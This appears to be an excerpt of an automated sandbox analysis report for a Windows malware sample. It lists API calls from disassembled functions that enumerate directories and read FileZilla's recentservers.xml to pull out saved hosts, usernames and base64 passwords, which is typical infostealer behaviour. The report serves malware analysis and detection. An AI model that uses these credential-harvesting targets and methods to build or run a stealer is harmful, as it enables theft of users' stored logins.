                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: 2b61a934acd9a257799024a1cf891d0a9bc3782ca2454f34281b9af3f4263be0
                              • Instruction ID: 5f5814baf29f0eae340843cd601952a6e7be9708becd9d486469365d86ef2796
                              • Opcode Fuzzy Hash: 2b61a934acd9a257799024a1cf891d0a9bc3782ca2454f34281b9af3f4263be0
                              • Instruction Fuzzy Hash: 1BA25D7191161BAFCF20AF69CC8EAAE7FB8BF45704F048528F905A7251DB34DD418BA4
                              Function 005915A0 Relevance: 202.4, APIs: 114, Strings: 1, Instructions: 1164stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005915E2
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00591619
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059166C
                              • lstrcat.KERNEL32(00000000), ref: 00591676
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005916A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005916EF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005916F9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591725
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591775
                              • lstrcat.KERNEL32(00000000), ref: 0059177F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005917AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 005917F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005917FE
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591809
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591829
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591835
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059185B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591866
                              • lstrlen.KERNEL32(\*.*), ref: 00591871
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0059188E
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 0059189A
                                • Part of subcall function 005B4020: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 005B404D
                                • Part of subcall function 005B4020: lstrcpy.KERNEL32(00000000,?), ref: 005B4082
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005918C3
                              • lstrcpy.KERNEL32(00000000,?), ref: 0059190E
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591916
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591921
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591941
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 0059194D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591976
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591981
                              • lstrlen.KERNEL32(005C1D5C), ref: 0059198C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005919AC
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005919B8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005919DE
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005919E9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591A11
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 00591A45
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 00591A70
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 00591A8A
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00591AC4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591AFB
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591B03
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591B0E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591B31
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591B3D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591B69
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591B74
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591B7F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591BA2
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591BAE
                              • lstrlen.KERNEL32(?), ref: 00591BBB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591BDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00591BE9
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591BF4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591C14
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591C20
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591C46
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591C51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591C7D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591CE0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591CEB
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591CF6
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591D19
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591D25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591D4B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591D56
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591D61
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591D81
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591D8D
                              • lstrlen.KERNEL32(?), ref: 00591D9A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591DBA
                              • lstrcat.KERNEL32(00000000,?), ref: 00591DC8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591DF4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591E3E
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00591E45
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 00591E9F
                              • lstrlen.KERNEL32(016095F8), ref: 00591EAE
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591EDB
                              • lstrcat.KERNEL32(00000000,?), ref: 00591EE3
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591EEE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591F0E
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591F1A
                              • lstrcpy.KERNEL32(00000000,?), ref: 00591F42
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00591F4D
                              • lstrlen.KERNEL32(005C1D5C), ref: 00591F58
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00591F75
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 00591F81
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$File$AttributesFindFirstFolderPath
                              • String ID: \*.*
                              • API String ID: 4127656590-1173974218
                              • Opcode ID: 053b7c733e2c8833abca37635209b78261814d2e101768a45ca42a6f1467a455
                              • Instruction ID: 9d761cb49752dcb2cf3414f8b9a1c102180da5b6b61caf81f427880d768e0450
                              • Opcode Fuzzy Hash: 053b7c733e2c8833abca37635209b78261814d2e101768a45ca42a6f1467a455
                              • Instruction Fuzzy Hash: E3924E7191262BABCF21AFA4DD8DAAE7FB9BF44700F044128F905A7251DB34DD41CBA4
                              Function 005A1C40 Relevance: 156.7, APIs: 88, Strings: 1, Instructions: 909stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A1C72
                              • lstrlen.KERNEL32(\*.*), ref: 005A1C7D
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1C9F
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 005A1CAB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1CD2
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 005A1CE7
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005A1D07
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005A1D21
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A1D5F
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A1D92
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A1DBA
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A1DC5
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1DEC
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A1DFE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1E20
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A1E2C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1E54
                              • lstrlen.KERNEL32(?), ref: 005A1E68
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1E85
                              • lstrcat.KERNEL32(00000000,?), ref: 005A1E93
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1EB9
                              • lstrlen.KERNEL32(01609668), ref: 005A1ECF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1EF9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A1F04
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1F2F
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A1F41
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1F63
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A1F6F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1F98
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1FC5
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A1FD0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A1FF7
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A2009
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A202B
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A2037
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2060
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A208F
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A209A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A20C1
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A20D3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A20F5
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A2101
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A212A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2159
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A2164
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A218D
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A21B9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A21D6
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A21E2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2208
                              • lstrlen.KERNEL32(0160DB10), ref: 005A221E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2252
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A2266
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2283
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A228F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A22B5
                              • lstrlen.KERNEL32(0160DC60), ref: 005A22CB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A22FF
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A2313
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2330
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A233C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2362
                              • lstrlen.KERNEL32(015FC088), ref: 005A2378
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A23A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A23AB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A23D6
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A23E8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2407
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A2413
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2438
                              • lstrlen.KERNEL32(?), ref: 005A244C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2470
                              • lstrcat.KERNEL32(00000000,?), ref: 005A247E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A24A3
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A24DF
                              • lstrlen.KERNEL32(0160DAC8), ref: 005A24EE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A2516
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A2521
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                              • String ID: \*.*
                              • API String ID: 712834838-1173974218
                              • Opcode ID: b6017a0c797a0ee85154f50f7da3a4b6dd954de411ea82f81da48f15b0abb96f
                              • Instruction ID: 253a84ba4109bb777428efd23ccd8cc8785a66e27f0a09bab537e22011f98d46
                              • Opcode Fuzzy Hash: b6017a0c797a0ee85154f50f7da3a4b6dd954de411ea82f81da48f15b0abb96f
                              • Instruction Fuzzy Hash: F9626F3191261BABCB21AF68DC4EAAF7FB9BF85700F044528F90597261DB34DD41CBA4
                              Function 005A3CC0 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • wsprintfA.USER32 ref: 005A3CDC
                              • FindFirstFileA.KERNEL32(?,?), ref: 005A3CF3
                              • StrCmpCA.SHLWAPI(?,005C1D68), ref: 005A3D1C
                              • StrCmpCA.SHLWAPI(?,005C1D6C), ref: 005A3D36
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A3D6F
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A3D97
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A3DA2
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A3DAD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3DCA
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A3DD6
                              • lstrlen.KERNEL32(?), ref: 005A3DE3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3E03
                              • lstrcat.KERNEL32(00000000,?), ref: 005A3E11
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3E3A
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A3E7E
                              • lstrlen.KERNEL32(?), ref: 005A3E88
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3EB5
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A3EC0
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3EE6
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A3EF8
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3F1A
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A3F26
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3F4E
                              • lstrlen.KERNEL32(?), ref: 005A3F62
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3F82
                              • lstrcat.KERNEL32(00000000,?), ref: 005A3F90
                              • lstrlen.KERNEL32(016095F8), ref: 005A3FBB
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A3FE1
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A3FEC
                              • lstrlen.KERNEL32(01609668), ref: 005A400E
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4034
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A403F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4067
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A4079
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4098
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A40A4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A40CA
                              • lstrcpy.KERNEL32(00000000,?), ref: 005A40F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4102
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4129
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A413B
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A415D
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A4169
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4192
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A41C1
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A41CC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A41F3
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A4205
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4227
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A4233
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A425C
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A428B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4296
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A42BD
                              • lstrlen.KERNEL32(005C1D5C), ref: 005A42CF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A42F1
                              • lstrcat.KERNEL32(00000000,005C1D5C), ref: 005A42FD
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4325
                              • lstrlen.KERNEL32(?), ref: 005A4339
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4359
                              • lstrcat.KERNEL32(00000000,?), ref: 005A4367
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4390
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A43CF
                              • lstrlen.KERNEL32(0160DAC8), ref: 005A43DE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A4406
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A4411
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A443A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A447E
                              • lstrcat.KERNEL32(00000000), ref: 005A448B
                              • FindNextFileA.KERNEL32(00000000,?), ref: 005A4689
                              • FindClose.KERNEL32(00000000), ref: 005A4698
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                              • String ID: %s\*.*
                              • API String ID: 1006159827-1013718255
                              • Opcode ID: 1479f6931c5ce7400466bf38f8c289cb52de2d3e676cb13c028d1a165755fc27
                              • Instruction ID: f11111d731efd41d95532e3d38dfc363de74f26945c674d64c5ca720246947cc
                              • Opcode Fuzzy Hash: 1479f6931c5ce7400466bf38f8c289cb52de2d3e676cb13c028d1a165755fc27
                              • Instruction Fuzzy Hash: 0F627F3191261BABCF21AFA4CC4DAAE7FB9BF85700F048128F90597251DB78DD41CBA4
                              Function 005A6DE0 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A6E15
                              • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 005A6E48
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6E82
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6EA9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 005A6EB4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6EDD
                              • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 005A6EF7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6F19
                              • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 005A6F25
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6F50
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 005A6F80
                              • LocalAlloc.KERNEL32(00000040,?), ref: 005A6FB5
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A701D
                              • lstrcpy.KERNEL32(00000000,005BD014), ref: 005A704D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1715378125.0000000000591000.00000040.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true
                              • Associated: 00000000.00000002.1715360287.0000000000590000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000061E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.000000000063F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715378125.00000000007C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715523787.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.00000000007DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000962000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A37000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A60000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A68000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715538045.0000000000A76000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715837534.0000000000A77000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715981332.0000000000C0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.1715995300.0000000000C0E000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_590000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 313953988-555421843
                              • Opcode ID: c50d0339fab5d6cbf58f23efa3a8c36097138507314508c092da9c7b703001cb
                              • Instruction ID: 7c9331fc7a6865928f9bcb18df2ac70bbc551151f4a2c098a723f15c53799e8d
                              • Opcode Fuzzy Hash: c50d0339fab5d6cbf58f23efa3a8c36097138507314508c092da9c7b703001cb
                              • Instruction Fuzzy Hash: 9A427F71A1521AAFCB10ABB4CC4DFAF7FB9BF49700F184428F905A7251EB74D9418BA4
